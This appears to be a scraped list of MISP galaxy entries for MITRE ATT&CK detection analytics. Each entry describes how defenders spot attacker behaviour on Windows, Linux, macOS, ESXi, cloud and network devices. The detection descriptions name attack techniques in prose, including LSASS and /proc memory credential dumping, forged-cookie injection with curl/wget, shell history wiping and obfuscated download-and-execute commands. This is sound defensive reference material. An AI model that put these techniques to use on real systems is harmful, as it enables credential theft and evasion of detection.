mitre_platforms ['Containers']

Analytic 0754 - AN0754

vSphere API logins (vimService) or SSH to ESXi host followed by unauthorized shell commands or lateral remote logins from the ESXi host.

Internal MISP references

UUID 8a534291-3b75-45ba-9f7b-b952251a3f03 which can be used as unique global reference for Analytic 0754 - AN0754 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0754
mitre_platforms ['ESXi']

Analytic 0574 - AN0574

Detects enumeration of VMs using PowerShell (Get-VM), VMware Workstation (vmrun.exe), or Hyper-V (VBoxManage.exe). Defender observes suspicious command lines executed by unexpected users or outside normal administrative sessions.

Internal MISP references

UUID be2239de-ae8e-442d-a9f6-d34460b94e94 which can be used as unique global reference for Analytic 0574 - AN0574 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0574
mitre_platforms ['Windows']

Analytic 0458 - AN0458

Chain: (1) cloud API calls that fetch tenant/organization password policy (e.g., AWS GetAccountPasswordPolicy, GCP/OCI equivalents or IAM settings reads); (2) within a short window, the same principal creates users, rotates creds, or changes auth settings. Use cloud audit logs.

Internal MISP references

UUID 12f9a28b-126d-48b1-bc93-5bc3c1635905 which can be used as unique global reference for Analytic 0458 - AN0458 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0458
mitre_platforms ['IaaS']

Analytic 0584 - AN0584

Excessive resource exhaustion or service crash induced by processes launched by users or scripts that rapidly consume CPU/memory or attempt malformed service interactions.

Internal MISP references

UUID 3102edb4-6947-4cef-9660-4a35d582a716 which can be used as unique global reference for Analytic 0584 - AN0584 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0584
mitre_platforms ['Windows']

Analytic 0485 - AN0485

On Linux, defenders may observe forged cookie activity as unauthorized modifications to browser cookie databases (e.g., ~/.mozilla/firefox/*/cookies.sqlite, ~/.config/chromium/Default/Cookies) or scripted injection of session tokens. Suspicious usage includes curl/wget commands embedding forged cookies in headers, correlated with abnormal session activity in SaaS or IaaS logs.

Internal MISP references

UUID 7b981ab1-eb5f-4ad0-a819-90db819a4431 which can be used as unique global reference for Analytic 0485 - AN0485 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0485
mitre_platforms ['Linux']

Analytic 0548 - AN0548

Detects suspicious MFA method changes, such as registration of weaker factors (e.g., SMS), or removal of MFA requirements for specific accounts or groups.

Internal MISP references

UUID 81c940cd-633b-4f88-9f8f-f6837a7026bc which can be used as unique global reference for Analytic 0548 - AN0548 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0548
mitre_platforms ['SaaS']

Analytic 0854 - AN0854

Adversary modifies GPO containers or files under SYSVOL using LDAP, ADSI, PowerShell (e.g., New-GPOImmediateTask) or GUI tools. This includes directory object changes (e.g., gPCFileSysPath), delegation assignments (SeEnableDelegationPrivilege), and SYSVOL file writes (ScheduledTasks.xml, GptTmpl.inf).

Internal MISP references

UUID ec6e1f3c-e9ff-4944-a426-863eaf9979ea which can be used as unique global reference for Analytic 0854 - AN0854 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0854
mitre_platforms ['Windows']

Analytic 0845 - AN0845

Router/switch receives a knock pattern (same src touches device unicast, broadcast, and network-address on same or stepped ports) followed by ACL/line-vty/service enable and the first mgmt session success.

Internal MISP references

UUID fe82e2a6-a928-4fe0-a899-fead90eabb29 which can be used as unique global reference for Analytic 0845 - AN0845 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0845
mitre_platforms ['Network Devices']

Analytic 0459 - AN0459

Chain: (1) IdP policy/read operations by a principal (e.g., Microsoft Entra/Graph requests to read password or authentication policies); (2) adjacent risky changes (role assignment, app consent) by same principal. Use IdP audit logs.

Internal MISP references

UUID 0b0d50a0-d07b-4cf1-9cb0-23c95e8321b2 which can be used as unique global reference for Analytic 0459 - AN0459 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0459
mitre_platforms ['Identity Provider']

Analytic 0549 - AN0549

Detects MFA bypass attempts by modifying tenant-wide authentication policies or excluding high-value accounts from MFA enforcement.

Internal MISP references

UUID 1193139d-0032-4d0b-88f1-c140abe2c964 which can be used as unique global reference for Analytic 0549 - AN0549 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0549
mitre_platforms ['Office Suite']

Analytic 0594 - AN0594

Direct login to cloud-hosted virtual machines via cloud-native access methods (e.g., EC2 Instance Connect, Azure Serial Console, SSM), followed by command execution or privilege escalation on the VM

Internal MISP references

UUID 926f4550-8c47-4882-afb3-1f0832c8d3b9 which can be used as unique global reference for Analytic 0594 - AN0594 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0594
mitre_platforms ['IaaS']

Analytic 0945 - AN0945

Detects user or root invocation of at command to schedule a job, followed by job execution using LaunchServices and activity in /usr/lib/cron/at.

Internal MISP references

UUID 98ce32fb-1b91-4487-9e5a-951375f2380e which can be used as unique global reference for Analytic 0945 - AN0945 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0945
mitre_platforms ['macOS']

Analytic 0495 - AN0495

Detects exploitation attempts against macOS authentication frameworks such as OpenDirectory or Keychain. Defender perspective includes abnormal crashes in opendirectoryd, unauthorized Keychain API usage, and unusual sudo or login events. Correlation links unexpected process behavior with credential access anomalies.

Internal MISP references

UUID bb339113-e807-45fe-99c4-ed8348e51b36 which can be used as unique global reference for Analytic 0495 - AN0495 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0495
mitre_platforms ['macOS']

Analytic 0954 - AN0954

Use of stolen Kerberos tickets or token impersonation resulting in logon sessions from accounts without expected interactive logon events.

Internal MISP references

UUID e7ce6bda-a4d3-43a4-afa0-34d57c34ef0d which can be used as unique global reference for Analytic 0954 - AN0954 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0954
mitre_platforms ['Windows']

Analytic 0466 - AN0466

Detects adversary behavior where the command-line arguments of a running process are overwritten in memory to spoof the process name, typically replacing it with a benign or misleading string. The detection correlates unexpected null byte sequences, discrepancies between /proc/<pid>/cmdline and process ancestry, and suspicious memory writes shortly after process start.

Internal MISP references

UUID 10d8886b-6cf6-45af-b187-04541e2ffaa4 which can be used as unique global reference for Analytic 0466 - AN0466 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0466
mitre_platforms ['Linux']

Analytic 0664 - AN0664

Adversary modifies internal or external site content through manipulated application bundles, hosted content, or web server configs.

Internal MISP references

UUID 3258db60-8500-4935-837c-78b23f2d83d1 which can be used as unique global reference for Analytic 0664 - AN0664 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0664
mitre_platforms ['macOS']

Analytic 0646 - AN0646

Detects anomalous usage of ESXi Guest Operations APIs such as StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, or InitiateFileTransferFromGuest. Defender perspective focuses on unusual frequency of guest API calls, invocation from unexpected management accounts, or execution outside of business hours. These correlated signals indicate adversarial abuse of ESXi administrative services to run commands on guest VMs.

Internal MISP references

UUID f25cf3cf-53b8-4fa4-be4c-d0a7a02bf739 which can be used as unique global reference for Analytic 0646 - AN0646 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0646
mitre_platforms ['ESXi']

Analytic 0467 - AN0467

Detects adversary behavior clearing command history via history -c, deletion or modification of ~/.bash_history, or manipulation of the HISTFILE environment variable post-login.

Internal MISP references

UUID 0ebcdeba-7b02-4f1c-96c9-a602b3663446 which can be used as unique global reference for Analytic 0467 - AN0467 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0467
mitre_platforms ['Linux']

Analytic 0647 - AN0647

Defenders may observe adversary attempts to collect or export full device configurations by detecting unusual SNMP queries, Smart Install (SMI) activity, or CLI/API commands that request running or startup configuration dumps. Correlated behaviors include high-volume read requests for sensitive OIDs, repeated use of 'show running-config' or equivalent commands from untrusted IPs, or unexpected TFTP/SCP/FTP transfers containing configuration files. These behaviors often appear in sequence: anomalous authentication or privilege escalation, followed by bulk configuration retrieval and outbound transfer.

Internal MISP references

UUID 58e73108-657e-42ce-8dad-4edc968a2b20 which can be used as unique global reference for Analytic 0647 - AN0647 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0647
mitre_platforms ['Network Devices']

Analytic 0746 - AN0746

Abuse of cloud messaging platforms to send mass spam or consume quota-based resources.

Internal MISP references

UUID 6e5bfc6b-3f07-426b-ac9f-6a8cc6b591c3 which can be used as unique global reference for Analytic 0746 - AN0746 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0746
mitre_platforms ['SaaS']

Analytic 0764 - AN0764

Correlation of registry key modification for Run/RunOnce with abnormal parent-child process relationships and outlier execution at user logon or system startup

Internal MISP references

UUID aa12f037-f724-43a6-97ca-e2e706859c1a which can be used as unique global reference for Analytic 0764 - AN0764 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0764
mitre_platforms ['Windows']

Analytic 0674 - AN0674

Monitor for abnormal certificate enrollment events in identity platforms, unexpected use of token-signing certificates, and unusual CA configuration modifications.

Internal MISP references

UUID af8d3a12-dafb-4e40-8017-7d20d9e77d55 which can be used as unique global reference for Analytic 0674 - AN0674 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0674
mitre_platforms ['Identity Provider']

Analytic 0476 - AN0476

EFI updates executed via system processes or binaries outside of expected patch windows or using unsigned firmware packages.

Internal MISP references

UUID df32865a-79b2-4faa-abd4-3ecfa27c8a77 which can be used as unique global reference for Analytic 0476 - AN0476 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0476
mitre_platforms ['macOS']

Analytic 0486 - AN0486

Forged cookies on macOS may show up as abnormal access to Safari/Chrome cookie databases in ~/Library/Cookies, combined with unexpected logon sessions authenticated by those cookies. Unified Logs may show cookie injection events or abnormal access patterns to Keychain when linked to browser authentication flows.

Internal MISP references

UUID 27a0146c-0af8-4323-9c41-fbd3df9af1fa which can be used as unique global reference for Analytic 0486 - AN0486 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0486
mitre_platforms ['macOS']

Analytic 0648 - AN0648

Processes accessing LSASS memory or SAM registry hives outside of trusted security tools, often followed by file creation or lateral movement. Detects unauthorized access to sensitive OS subsystems for credential extraction.

Internal MISP references

UUID 5a5d5ff5-e2bb-4ba9-9f95-504c86b1a1cf which can be used as unique global reference for Analytic 0648 - AN0648 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0648
mitre_platforms ['Windows']

Analytic 0846 - AN0846

Adversary enumeration of local user accounts using Net.exe, WMI, or PowerShell.

Internal MISP references

UUID 6ffbdad6-3d60-452b-9e04-a8292d0125e9 which can be used as unique global reference for Analytic 0846 - AN0846 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0846
mitre_platforms ['Windows']

Analytic 0864 - AN0864

A tampered app/pkg/notarized update is installed via installer, softwareupdated, Homebrew, or vendor updater; new Mach-O or bundle contents appear in /Applications, /Library, /usr/local or /opt/homebrew; first run spawns sh/zsh/osascript/curl and makes egress to unfamiliar domains; AMFI/Gatekeeper may log signature/notarization problems.

Internal MISP references

UUID 86a87684-5fd5-4778-be36-5dfa07a4246d which can be used as unique global reference for Analytic 0864 - AN0864 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0864
mitre_platforms ['macOS']

Analytic 0468 - AN0468

Detects adversary clearing shell history using history -c or deleting/altering ~/.zsh_history or ~/.bash_history. Focus on sessions with missing or wiped history.

Internal MISP references

UUID 9199891a-1543-4f51-be59-4fffb03dfd43 which can be used as unique global reference for Analytic 0468 - AN0468 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0468
mitre_platforms ['macOS']

Analytic 0684 - AN0684

Audit VoIP/SIP logs for suspicious outbound calls or call setup messages to unusual endpoints. Correlate with user activity such as browser execution or package installation following the call.

Internal MISP references

UUID c5134555-561a-4905-8601-a6ba307fc121 which can be used as unique global reference for Analytic 0684 - AN0684 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0684
mitre_platforms ['Linux']

Analytic 0469 - AN0469

Detects PowerShell Clear-History invocation or deletion of ConsoleHost_history.txt to erase past PowerShell session history.

Internal MISP references

UUID 01b79770-a269-4b4d-bf09-a4760bae9c94 which can be used as unique global reference for Analytic 0469 - AN0469 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0469
mitre_platforms ['Windows']

Analytic 0496 - AN0496

Detects exploitation of vulnerabilities in cloud identity providers (IdPs) such as Azure AD or Okta for credential access. Defender perspective includes anomalous token creation or renewal, authentication bypass events, and API abuse to mint unauthorized tokens. Correlation highlights exploitation attempts tied to absent or inconsistent audit logs.

Internal MISP references

UUID 0b8b8557-0393-4c63-963f-e5a3b5cc6ad8 which can be used as unique global reference for Analytic 0496 - AN0496 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0496
mitre_platforms ['Identity Provider']

Analytic 0694 - AN0694

Defenders observe command-line executions or API-based registry reads targeting sensitive paths like HKLM or HKCU with keyword filters such as 'password', 'cred', or 'logon'. Typically performed by Reg.exe, PowerShell, custom binaries, or offensive tools such as Cobalt Strike. Correlation with process ancestry and command-line arguments indicates suspicious credential discovery activity.

Internal MISP references

UUID 4c744ac0-ba25-4b42-8397-9b398ba55eb8 which can be used as unique global reference for Analytic 0694 - AN0694 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0694
mitre_platforms ['Windows']

Analytic 0649 - AN0649

Processes opening /proc//mem or /proc//maps targeting credential-storing services like sshd or login. Behavior often includes high privilege escalation and memory inspection tools such as gcore or gdb.

Internal MISP references

UUID 82cdec5a-52af-4489-b002-b0256e5ba60e which can be used as unique global reference for Analytic 0649 - AN0649 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0649
mitre_platforms ['Linux']

Analytic 0964 - AN0964

User pastes an obfuscated command into Terminal.app/iTerm2 that decodes or downloads code and executes. Detects Terminal/iTerm2 spawning bash/zsh/python with suspicious pipeline/base64 patterns followed by file writes in ~/Library or /tmp and outbound network connections.

Internal MISP references

UUID acf0fdbb-6fbf-42c0-acc4-75a545c24f90 which can be used as unique global reference for Analytic 0964 - AN0964 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0964
mitre_platforms ['macOS']

Analytic 0946 - AN0946

Implantation of malicious code into container images followed by registry push and use in new deployments.

Internal MISP references

UUID de0a1136-1476-4c28-bf49-004ac3ef97f7 which can be used as unique global reference for Analytic 0946 - AN0946 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0946
mitre_platforms ['Containers']

Analytic 0477 - AN0477

Firmware image uploaded via TFTP/SCP or web interface followed by reboot or unexpected loss of connectivity.

Internal MISP references

UUID 39d675d5-548d-4b35-8a8f-a6605ae3835d which can be used as unique global reference for Analytic 0477 - AN0477 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0477
mitre_platforms ['Network Devices']

Analytic 0747 - AN0747

Detects adversarial archiving using libraries (zlib, zip APIs) invoked by scripts or binaries. Correlates process executions of Python, PowerShell, or custom .NET binaries with DLL/module loads linked to compression libraries, followed by archive file creation.

Internal MISP references

UUID 4bdc0555-f7f0-4b5b-80c9-77f361881a01 which can be used as unique global reference for Analytic 0747 - AN0747 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0747
mitre_platforms ['Windows']

Analytic 0774 - AN0774

Unusual modification of boot records (MBR, VBR) or EFI partitions not associated with legitimate patch cycles or OS upgrades. Registry or WMI events associated with firmware update tools executed from unexpected parent processes. API calls (e.g., DeviceIoControl) writing directly to raw disk sectors. Subsequent abnormal boot configuration changes followed by unsigned driver loads.

Internal MISP references

UUID e2ca60b5-82df-4e7e-8528-dd24d9a79750 which can be used as unique global reference for Analytic 0774 - AN0774 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0774
mitre_platforms ['Windows']

Analytic 0478 - AN0478

Script or binary performs a rapid sequence of system discovery checks (e.g., CPU count, RAM size, registry keys, running processes) indicative of VM detection

Internal MISP references

UUID 04bcbbb7-bfa9-41a5-9fb8-72a6df9ad50b which can be used as unique global reference for Analytic 0478 - AN0478 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0478
mitre_platforms ['Windows']

Analytic 0874 - AN0874

Detection of HTML-based downloads via Safari/Chrome that create obfuscated files (e.g., .zip, .app, .js) in user directories and are followed by suspicious executions from preview or launch services.

Internal MISP references

UUID 5f8b5ef5-8b4a-4713-a694-dc0746669a73 which can be used as unique global reference for Analytic 0874 - AN0874 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0874
mitre_platforms ['macOS']

Analytic 0784 - AN0784

Identifies archive utilities (e.g., ditto, unzip, xar, pkgutil) used to extract payloads to non-standard paths, then correlates with execution or file permission changes (e.g., chmod +x) and process spawns from decompressed location.

Internal MISP references

UUID 62afd8a1-550d-43a6-a56a-7d5ae5abbcf6 which can be used as unique global reference for Analytic 0784 - AN0784 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0784
mitre_platforms ['macOS']

Analytic 0847 - AN0847

Enumeration of local users or groups via file access (/etc/passwd) or commands like id, groups.

Internal MISP references

UUID 7b87b63c-0936-48b5-8017-47bf5561e6f9 which can be used as unique global reference for Analytic 0847 - AN0847 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0847
mitre_platforms ['Linux']

Analytic 0748 - AN0748

Detects adversarial archiving by scripts or binaries calling compression libraries (libzip, zlib, bzip2). Correlates execution of Python, Perl, or compiled binaries with dynamic linking to archiving libraries and creation of compressed files in /tmp or user directories.

Internal MISP references

UUID 90e51090-9857-4a28-98b9-f21401ddbe85 which can be used as unique global reference for Analytic 0748 - AN0748 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0748
mitre_platforms ['Linux']

Analytic 0487 - AN0487

Forged cookies in SaaS environments manifest as valid web sessions without matching login activity, MFA enforcement bypass, or cookies reused across multiple devices/IPs. Defenders should look for cookie replay, concurrent sessions from multiple geographies, or session tokens generated by unrecognized apps.

Internal MISP references

UUID f8c255ac-8ba5-4971-9e11-420a10e688ad which can be used as unique global reference for Analytic 0487 - AN0487 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0487
mitre_platforms ['SaaS']

Analytic 0794 - AN0794

Monitor Mail.app activity or unified logs for anomalous SMTP usage, including mismatches between display name and authenticated AppleID or Exchange credentials. Detect use of third-party mail utilities that attempt to send on behalf of corporate identities.

Internal MISP references

UUID 1305f37f-8333-4d86-9714-340b66c65771 which can be used as unique global reference for Analytic 0794 - AN0794 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0794
mitre_platforms ['macOS']

Analytic 0749 - AN0749

Detects malicious archiving via system or third-party libraries (libz, libarchive) invoked by Python, Swift, or Objective-C binaries. Correlates unified logs of library loads with creation of compressed or encrypted archives (.zip, .gz, .bz2, .dmg).

Internal MISP references

UUID 4ecd8727-bcf3-4fce-8c04-e8d0bad1267e which can be used as unique global reference for Analytic 0749 - AN0749 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0749
mitre_platforms ['macOS']

Analytic 0947 - AN0947

Creation or modification of cloud virtual machine images (AMIs, custom images) with persistence mechanisms, followed by infrastructure provisioning that uses these implanted images.

Internal MISP references

UUID 7845facb-50f2-4d32-ae00-6766b9410681 which can be used as unique global reference for Analytic 0947 - AN0947 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0947
mitre_platforms ['IaaS']

Analytic 0479 - AN0479

Shell script or binary uses multiple system commands (e.g., dmidecode, lscpu, lspci) in quick succession to detect virtualization environment

Internal MISP references

UUID 7b4b3b54-d992-4f03-922a-6eec96c9342e which can be used as unique global reference for Analytic 0479 - AN0479 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0479
mitre_platforms ['Linux']

Analytic 0974 - AN0974

Detects usage of shared memory directories (/dev/shm, /run/shm) for temporary storage of obfuscated, encoded, or executable data without persistence to disk.

Internal MISP references

UUID b521510b-83bc-46a2-8fc8-65a6975bcfca which can be used as unique global reference for Analytic 0974 - AN0974 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0974
mitre_platforms ['Linux']

Analytic 0497 - AN0497

Detection of anomalous ROMMON image changes or upgrades, unexpected reboots following firmware updates, and unauthorized use of firmware upgrade commands or TFTP transfers. Correlation of config modification, privilege escalation, and boot cycle anomalies provides visibility into ROMMON tampering attempts.

Internal MISP references

UUID ca649f9b-2a1f-4d45-b61b-33ac38d6a4ee which can be used as unique global reference for Analytic 0497 - AN0497 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0497
mitre_platforms ['Network Devices']

Analytic 0884 - AN0884

Abnormal invocation of diskutil or asr with destructive flags (eraseDisk, zeroDisk), or low-level IOKit calls that overwrite raw disk content. Detect correlation between elevated process execution and disk erase operations.

Internal MISP references

UUID 1065ad69-8969-4ae0-9df6-dc7e7b1129c2 which can be used as unique global reference for Analytic 0884 - AN0884 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0884
mitre_platforms ['macOS']

Analytic 0848 - AN0848

Enumeration of macOS local users using dscl, id, dscacheutil, or /etc/passwd access.

Internal MISP references

UUID be680af0-8d5f-482c-9042-f5d4921e65f8 which can be used as unique global reference for Analytic 0848 - AN0848 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0848
mitre_platforms ['macOS']

Analytic 0488 - AN0488

A trusted/signed developer utility (parent) is executed in a non-developer context and (a) spawns suspicious children (e.g., powershell.exe, cmd.exe, rundll32.exe, regsvr32.exe, wscript.exe), (b) loads unsigned/user-writable DLLs, (c) writes and then runs a new PE from user-writable paths, and/or (d) immediately makes outbound network connections.

Internal MISP references

UUID d69c9d97-17d6-4dad-a4d4-ec41e7fb34fb which can be used as unique global reference for Analytic 0488 - AN0488 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0488
mitre_platforms ['Windows']

Analytic 0498 - AN0498

Correlated evidence of anomalous browser/network behavior (suspicious external resource fetches and script injection patterns) followed by atypical child processes, ephemeral execution contexts, memory modification or process injection, and unexpected file drops. Defender sees network requests to previously unseen/suspicious domains or resources + browser process spawning unusual children or loading unsigned modules + file writes or registry changes shortly after those requests.

Internal MISP references

UUID 35701083-a327-4f68-a426-13751b9743c3 which can be used as unique global reference for Analytic 0498 - AN0498 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0498
mitre_platforms ['Windows']

Analytic 0489 - AN0489

High-frequency, repetitive service requests (e.g., HTTP, TLS renegotiation) originating from a single or small set of source IPs targeting endpoint web services or application ports, leading to exhaustion of CPU or memory on targeted Windows services.

Internal MISP references

UUID 8c03988c-3387-48e4-8013-7b9d223b8911 which can be used as unique global reference for Analytic 0489 - AN0489 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0489
mitre_platforms ['Windows']

Analytic 0894 - AN0894

Disabling of security macros or safe mode settings within Word/Excel/Outlook. Detect registry edits or configuration file changes that weaken macro enforcement.

Internal MISP references

UUID a807fb55-1c4f-4353-90d6-1a05aa05f2c9 which can be used as unique global reference for Analytic 0894 - AN0894 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0894
mitre_platforms ['Office Suite']

Analytic 0948 - AN0948

Detects anomalous use of macOS XPC services for code execution. Monitors for processes invoking privileged XPC daemons with abnormal parameters, unexpected binaries communicating over NSXPCConnection, or helper tools executing code outside of their expected parent process lineage. Correlates process access attempts to system-level daemons, privilege escalations via XPC misconfigurations, and injection of malicious payloads through inter-process communication.

Internal MISP references

UUID a8284241-0d8e-42da-b86d-48f0d660df6c which can be used as unique global reference for Analytic 0948 - AN0948 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0948
mitre_platforms ['macOS']

Analytic 0984 - AN0984

Detects renamed binaries or scripts placed into trusted paths like /usr/bin or /lib with mismatched metadata or unexpected creation/modification times.

Internal MISP references

UUID adf3e421-95ec-4b5a-9c00-0262cb888c0a which can be used as unique global reference for Analytic 0984 - AN0984 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0984
mitre_platforms ['Linux']

Analytic 0849 - AN0849

Enumeration of local ESXi accounts using esxcli or vSphere API from unauthorized sessions.

Internal MISP references

UUID d2bca034-2f97-4c64-ac30-e75d24886be7 which can be used as unique global reference for Analytic 0849 - AN0849 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0849
mitre_platforms ['ESXi']

Analytic 0499 - AN0499

Correlated evidence of browser or webview fetches to uncommon domains or mutated JS resources (proxy/NGFW logs + Zeek/HTTP logs) followed by unexpected interpreters or script engines executing (python, ruby, sh) spawned from browser processes or user sessions, rapid on-disk staging in /tmp, and outbound connections that deviate from baseline. Defender sees: uncommon resource fetch → short-lived child process executions from user browser context → file writes in temp directories → anomalous outbound C2-like connections.

Internal MISP references

UUID 32b5b330-2a40-4117-8999-395c23490614 which can be used as unique global reference for Analytic 0499 - AN0499 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0499
mitre_platforms ['Linux']

Analytic 0994 - AN0994

Monitor unified logs for processes spawned from Safari or other browsers that immediately load scripts or executables. Detect file drops in ~/Library/Caches or ~/Downloads that execute shortly after being written.

Internal MISP references

UUID ba6a9282-30e0-491c-90a7-35bf4ad25ba3 which can be used as unique global reference for Analytic 0994 - AN0994 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0994
mitre_platforms ['macOS']

Analytic 0949 - AN0949

Monitors for unexpected modifications of system or application binaries, particularly signed executables. Correlates file write events with subsequent unsigned or anomalously signed process execution, and checks for tampered binaries outside normal patch cycles.

Internal MISP references

UUID e2ebd04e-074d-4b90-b94c-a43048b1c3ac which can be used as unique global reference for Analytic 0949 - AN0949 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0949
mitre_platforms ['Windows']

Analytic 0555 - AN0555

Identify unauthorized creation, deletion, or modification of business-critical stored data such as Office documents, database files, and log archives. Detect anomalous processes modifying stored data outside of expected workflows (e.g., non-database processes modifying database files).

Internal MISP references

UUID e08eb9fa-4a45-434b-9776-277bd545f1f7 which can be used as unique global reference for Analytic 0555 - AN0555 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0555
mitre_platforms ['Windows']

Analytic 0556 - AN0556

Detect suspicious file creation, modification, or deletion in stored data directories (e.g., /var/lib/mysql/, /var/log/, mail spools). Identify shell commands interacting directly with structured data files instead of legitimate database utilities.

Internal MISP references

UUID 425a3e89-ac22-4ff3-bc1e-ca1672113075 which can be used as unique global reference for Analytic 0556 - AN0556 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0556
mitre_platforms ['Linux']

Analytic 0655 - AN0655

Detection of spearphishing attachments by correlating suspicious email delivery with subsequent file creation and abnormal process execution (e.g., Office spawning PowerShell or CMD). Behavior chain includes inbound email metadata → attachment stored on disk → process execution → outbound network activity.

Internal MISP references

UUID db6995d9-68ab-4638-a430-c0a8d2daf306 which can be used as unique global reference for Analytic 0655 - AN0655 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0655
mitre_platforms ['Windows']

Analytic 0565 - AN0565

Applications such as curl, wget, or custom binaries initiate HTTPS connections where the TLS SNI is mismatched or absent while HTTP Host targets CDN-available C2 endpoints.

Internal MISP references

UUID e031d1a5-92a9-46df-9467-d6899d48f57b which can be used as unique global reference for Analytic 0565 - AN0565 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0565
mitre_platforms ['Linux']

Analytic 0557 - AN0557

Monitor sensitive data files such as plist-based storage, mail archives, or Office files for unexpected modifications. Detect anomalous processes modifying stored data outside expected update cycles using FSEvents and Unified Logs.

Internal MISP references

UUID 23b6aee9-90fc-46b8-bf8b-36043218f393 which can be used as unique global reference for Analytic 0557 - AN0557 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0557
mitre_platforms ['macOS']

Analytic 0575 - AN0575

Detects VM enumeration attempts using virtualization utilities such as VirtualBox (VBoxManage) or Parallels CLI. Defender observes abnormal invocation of VM listing commands correlated with non-admin users or unusual parent processes.

Internal MISP references

UUID 86bb41b4-5c8a-4407-b788-8f6ea8457860 which can be used as unique global reference for Analytic 0575 - AN0575 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0575
mitre_platforms ['macOS']

Analytic 0755 - AN0755

Adversary modifies Group Policy Objects (GPOs), domain trust, or directory service objects via GUI, CLI, or programmatic APIs. Behavior includes creation/modification of GPOs, delegation permissions, trust objects, or rogue domain controller registration.

Internal MISP references

